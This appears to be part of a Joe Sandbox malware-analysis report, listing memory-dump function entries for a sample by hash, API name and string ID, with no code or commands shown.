                                                                                                                                      • API ID:
                                                                                                                                      • String ID: MUI
                                                                                                                                      • API String ID: 0-1339004836
                                                                                                                                      • Opcode ID: 56e7a33e9c167fedbb5946b1d4902bb582d29940c00ab937ae12654820b64d1d
                                                                                                                                      • Instruction ID: de56349348d2076b5ddb459f479536c4ced599fc599b9bbe01c7e80eb4e900f4
                                                                                                                                      • Opcode Fuzzy Hash: 56e7a33e9c167fedbb5946b1d4902bb582d29940c00ab937ae12654820b64d1d
                                                                                                                                      • Instruction Fuzzy Hash: 0C825F79E00B198FEB14CFA9C9807EDB7B5FF48750F1481A9D859AB250EB349981CF50
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 981330afdcd9a9907a9edacbecc911f8448cd49c862e3fd064e0847ff6f2bfcd
                                                                                                                                      • Instruction ID: 89058ec4fa19d2ca30f88e96dd532958a29370717404d751e82350c547331970
                                                                                                                                      • Opcode Fuzzy Hash: 981330afdcd9a9907a9edacbecc911f8448cd49c862e3fd064e0847ff6f2bfcd
                                                                                                                                      • Instruction Fuzzy Hash: B2E19078618B41CFD304CF28C4D0A2ABBE1FF88354F858A6DE58597361DB31E986CB91
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: @[-4@[-4
                                                                                                                                      • API String ID: 0-2023595857
                                                                                                                                      • Opcode ID: 50a76976aaf54cd3c905ae6f2afc1ff0b67caf6e443ef9cff70ef1a23743367d
                                                                                                                                      • Instruction ID: cfaa152862190b6a0f7d7f7e024923b5bde977337e81f4863afe25db8b40d50d
                                                                                                                                      • Opcode Fuzzy Hash: 50a76976aaf54cd3c905ae6f2afc1ff0b67caf6e443ef9cff70ef1a23743367d
                                                                                                                                      • Instruction Fuzzy Hash: 94327EB5E10219DFDB24CFA8C894BAEBBB6FF44748F144169E805BB390E7359941CB90
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 587b3b1033d37270f22b5025d171e326b17788cf1efa127e41331dff1e4a7d82
                                                                                                                                      • Instruction ID: 3a359cb77d7b3bdfa8c7bdb697f58b7fa3a72a658cf1868574c40f15c7a4ed27
                                                                                                                                      • Opcode Fuzzy Hash: 587b3b1033d37270f22b5025d171e326b17788cf1efa127e41331dff1e4a7d82
                                                                                                                                      • Instruction Fuzzy Hash: F0A1E271E0075AEFFB11CBA4C844BAEBBE5EF44754F024265E910BB2D0DB749984CB91
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 644d81b6498ed0c98609880aff0aa4a21f3c1affa06495978397a6c989d17255
                                                                                                                                      • Instruction ID: bf04f53d05f601298fb99ff066cfb60370f027f7c59bdc4c44075d9b20ba4341
                                                                                                                                      • Opcode Fuzzy Hash: 644d81b6498ed0c98609880aff0aa4a21f3c1affa06495978397a6c989d17255
                                                                                                                                      • Instruction Fuzzy Hash: E1B1337AA00A02DFF708CF69D484A69FBF5FF49344F2585AED4299B351D730A981CB90
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3446177414-0
                                                                                                                                      • Opcode ID: ee8f8497196ab5e1982382c388853c2a105277a7de44890755d8479177d167f3
                                                                                                                                      • Instruction ID: 213c0daeecf1c82c814244bf32a03e59bb7eeacd262dce00f944bd2e8666e0d8
                                                                                                                                      • Opcode Fuzzy Hash: ee8f8497196ab5e1982382c388853c2a105277a7de44890755d8479177d167f3
                                                                                                                                      • Instruction Fuzzy Hash: 55B111B5A097818FD354CF28C480A6AFBF1BB88304F15496EF899D7352D771E885CB42
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: 80a36826df134ba40c83373fd672d5122b6b7f2fe30b5cadd2570b3b4ac8fa1e
                                                                                                                                      • Instruction ID: ec2e3f2be51051f1b7b7e110c6dfd3536017f67e29c5f15c0287817b631c0ccb
                                                                                                                                      • Opcode Fuzzy Hash: 80a36826df134ba40c83373fd672d5122b6b7f2fe30b5cadd2570b3b4ac8fa1e
                                                                                                                                      • Instruction Fuzzy Hash: 70815E75A00309BEEB61DBA5CC81E9FBBBCEF44754F100629E516B7190D6B4E980CBA4
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3446177414-0
                                                                                                                                      • Opcode ID: fb90b6cbc721aba61816c6194c28306994e1756c905713ff4de5134a92e072e8
                                                                                                                                      • Instruction ID: 7ae674be719e504622c9d5e65065b2d7d52b16c863088a45d34579af882de339
                                                                                                                                      • Opcode Fuzzy Hash: fb90b6cbc721aba61816c6194c28306994e1756c905713ff4de5134a92e072e8
                                                                                                                                      • Instruction Fuzzy Hash: 3841A1B8901F04CFE715DF24D9A06A9F7F6FF49354F1186AAD416AB2A0DB30A981CF41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3446177414-0
                                                                                                                                      • Opcode ID: bf461a1f75d223afe42a77038bbc2bdafbfbd9e4a9fa4a937a0211d849e360d7
                                                                                                                                      • Instruction ID: 0a9593befcf5fc2dfaa557a85c37b3f439799e10ab0593ab70530e939b07ebdb
                                                                                                                                      • Opcode Fuzzy Hash: bf461a1f75d223afe42a77038bbc2bdafbfbd9e4a9fa4a937a0211d849e360d7
                                                                                                                                      • Instruction Fuzzy Hash: 344180719043019FE360DF28C844B9BBBE8FF88354F008A2AF999E7291D7749945CF92
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3446177414-0
                                                                                                                                      • Opcode ID: 057f060abc0adb92912d2913de794d52841b358c7d329ffaf7e1681027b350cd
                                                                                                                                      • Instruction ID: 711483238016c4420c176e1f0407c6ab9ed3cfe27947e900226917b53a6864b7
                                                                                                                                      • Opcode Fuzzy Hash: 057f060abc0adb92912d2913de794d52841b358c7d329ffaf7e1681027b350cd
                                                                                                                                      • Instruction Fuzzy Hash: B641CD78A40F418FE314CF68C8D4F3ABBEAEB81790F41456DE5419B2A0DB31D882DA91
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: w
                                                                                                                                      • API String ID: 0-476252946
                                                                                                                                      • Opcode ID: 790636ca18cb21e5e1f4cc79c4b8efaa762ae8755ba468e1dda80f1ca05c374c
                                                                                                                                      • Instruction ID: 741e4d197135b8bf8a111b534cfdc3d276e7ef843f19ac2e166fd79a07873734
                                                                                                                                      • Opcode Fuzzy Hash: 790636ca18cb21e5e1f4cc79c4b8efaa762ae8755ba468e1dda80f1ca05c374c
                                                                                                                                      • Instruction Fuzzy Hash: CCD1CF74900216EFEB14CF66C481ABFBBB6FF44704F10845EE899AB242E735E981C790
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3446177414-0
                                                                                                                                      • Opcode ID: 0d2291f7c4487c35aa9401b53fe24a30782abd4ddf82eacdba450cde82e83f40
                                                                                                                                      • Instruction ID: 5d2622595fe43c9e4baa278f9d82998b05c994879a139027bbec345f56d502da
                                                                                                                                      • Opcode Fuzzy Hash: 0d2291f7c4487c35aa9401b53fe24a30782abd4ddf82eacdba450cde82e83f40
                                                                                                                                      • Instruction Fuzzy Hash: 8E3124B2600A04DFD711CF18C8C0A6B77A9EF46760F1142ADEE169B291CB32ED42CBD0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3446177414-0
                                                                                                                                      • Opcode ID: 650565e5e3c623a0a34160ec9b85d7f5862b754f17423682e8d1459d1f7209be
                                                                                                                                      • Instruction ID: 3731195422029992f5ca6967a32284c2dd2a45f0f306cf59e940964e44e0a097
                                                                                                                                      • Opcode Fuzzy Hash: 650565e5e3c623a0a34160ec9b85d7f5862b754f17423682e8d1459d1f7209be
                                                                                                                                      • Instruction Fuzzy Hash: 1B31B039B15E06FFE7858B64CE80A59BBA6FF84740F805055E80197B50DB31E871CF80
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3446177414-0
                                                                                                                                      • Opcode ID: 06a5fc532fbd7c4f46eb3fc1c2e662259c99d53e3e53129bdac363cbda628dcc
                                                                                                                                      • Instruction ID: 833744cf28aad1175bc4638bae3d0f6cc82cd7e75b8b0aeeb36c4092062259b9
                                                                                                                                      • Opcode Fuzzy Hash: 06a5fc532fbd7c4f46eb3fc1c2e662259c99d53e3e53129bdac363cbda628dcc
                                                                                                                                      • Instruction Fuzzy Hash: AF316AB59083068FD700DF19C44094ABBE6FF8A258F4486AEE498AB261D331E905CF92
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3446177414-0
                                                                                                                                      • Opcode ID: f35c74f048b45069a46ec492d6ad7a74f053149b26fa96c9b4643b8408f9794f
                                                                                                                                      • Instruction ID: 407aa09d7933efad70fafcf64793a5a204b810e5ea28d9409134504442ba248a
                                                                                                                                      • Opcode Fuzzy Hash: f35c74f048b45069a46ec492d6ad7a74f053149b26fa96c9b4643b8408f9794f
                                                                                                                                      • Instruction Fuzzy Hash: 8F212239601F08DFE321AF14C9C4B2ABBA6EF85B10F422599E8451B350C772ED89CF81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3446177414-0
                                                                                                                                      • Opcode ID: 2be385a628cb63047a5bdb82bc51c408e7c040e47a09bae6ce0deb91526f24db
                                                                                                                                      • Instruction ID: fdc3cccb66b54f2fcb7712a8e3cb914c2395125c5082d14567880ec95ed8c9e2
                                                                                                                                      • Opcode Fuzzy Hash: 2be385a628cb63047a5bdb82bc51c408e7c040e47a09bae6ce0deb91526f24db
                                                                                                                                      • Instruction Fuzzy Hash: 92019A36611219AFDF028F84DC40ECA3F66FB4C754F068141FE2966220C676D9B1EF90
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 007fdfb0a2bed9878274a251ecdf9bffc497d2d3b6fa4f5bd7076a89044ba4f5
                                                                                                                                      • Instruction ID: 52985fe297e183a807158f1f01c849dbed38f3c20bcf70d24e398f264a30f2aa
                                                                                                                                      • Opcode Fuzzy Hash: 007fdfb0a2bed9878274a251ecdf9bffc497d2d3b6fa4f5bd7076a89044ba4f5
                                                                                                                                      • Instruction Fuzzy Hash: 2FE06D72B14208ABEB04DB59D845F8A77ECEB8979CF1400A9F50BE7180DAA4DE41DA90
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 0-3916222277
                                                                                                                                      • Opcode ID: e19c76d1bc245067bab69570c0ba5f12ea01f036409a1028ae0701028d37c839
                                                                                                                                      • Instruction ID: a13430167f900cc797a0767de0771c80eedaad15a3f2e375d429b2e1717ee11e
                                                                                                                                      • Opcode Fuzzy Hash: e19c76d1bc245067bab69570c0ba5f12ea01f036409a1028ae0701028d37c839
                                                                                                                                      • Instruction Fuzzy Hash: 6A919071A00619EFEB21CF98CD84FAEBBB8EF04754F100069F601BB291DB759941CBA4
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: GlobalTags
                                                                                                                                      • API String ID: 0-1106856819
                                                                                                                                      • Opcode ID: 52962b2977f53c311bc8fdf97ee20d99f889a79c71d8790c0a7cc991d8ce4e7c
                                                                                                                                      • Instruction ID: d8774670f6cf58e9c0047ee574650b4cca98f3d5fb6ae768804d5b7c53752554
                                                                                                                                      • Opcode Fuzzy Hash: 52962b2977f53c311bc8fdf97ee20d99f889a79c71d8790c0a7cc991d8ce4e7c
                                                                                                                                      • Instruction Fuzzy Hash: 22715DB5E0021ADFEB14CF98D58069DFBF2BF58390F1481AEE409B7264EB358941CB54
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: @
                                                                                                                                      • API String ID: 0-2766056989
                                                                                                                                      • Opcode ID: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
                                                                                                                                      • Instruction ID: 23fc3f89ef96dc1a9d3909af33d732bbf3d054a29f3e176fa885294f0ac9ce0b
                                                                                                                                      • Opcode Fuzzy Hash: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
                                                                                                                                      • Instruction Fuzzy Hash: F8616CB9D10A1AEFEB11CF95C880BEEBBB9EF44750F114159E810B7250D7758A85CFA0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: @
                                                                                                                                      • API String ID: 0-2766056989
                                                                                                                                      • Opcode ID: 9f61a4bdb5714a2bb9f6651e875168b777453bd48b0093045f8e61e884682dbf
                                                                                                                                      • Instruction ID: dcfb2112ab79247f00edadba74755ac8e17b7018905070b89c23306c544da069
                                                                                                                                      • Opcode Fuzzy Hash: 9f61a4bdb5714a2bb9f6651e875168b777453bd48b0093045f8e61e884682dbf
                                                                                                                                      • Instruction Fuzzy Hash: EC51DDB2204746AFEB218E14C880F6BB7E9FB84798F41092DF941A7290D7B9DD44CB91
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 0h-4
                                                                                                                                      • API String ID: 0-2520060799
                                                                                                                                      • Opcode ID: 9391b06f58055c35c891a27d3da7ccbc4226132b83ec8432c80bbecfff66d107
                                                                                                                                      • Instruction ID: fadb79fd81e9a28ca454c95a632f26a633464e267cfe61495347d76213bf7a20
                                                                                                                                      • Opcode Fuzzy Hash: 9391b06f58055c35c891a27d3da7ccbc4226132b83ec8432c80bbecfff66d107
                                                                                                                                      • Instruction Fuzzy Hash: 4841C379710716DFE715CA2ACC90B6BB7AAFF847A0F40825DEC19A7290EF34D801C691
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: EXT-
                                                                                                                                      • API String ID: 0-1948896318
                                                                                                                                      • Opcode ID: 58a0ef2ee40ab7347498390eda0068c4e5f2b5a5fea94cadd52f0ecac48f52a7
                                                                                                                                      • Instruction ID: 8c68e22d5161c8db23dd487a8bd88ed9a073c0aed271839a36029597389956bc
                                                                                                                                      • Opcode Fuzzy Hash: 58a0ef2ee40ab7347498390eda0068c4e5f2b5a5fea94cadd52f0ecac48f52a7
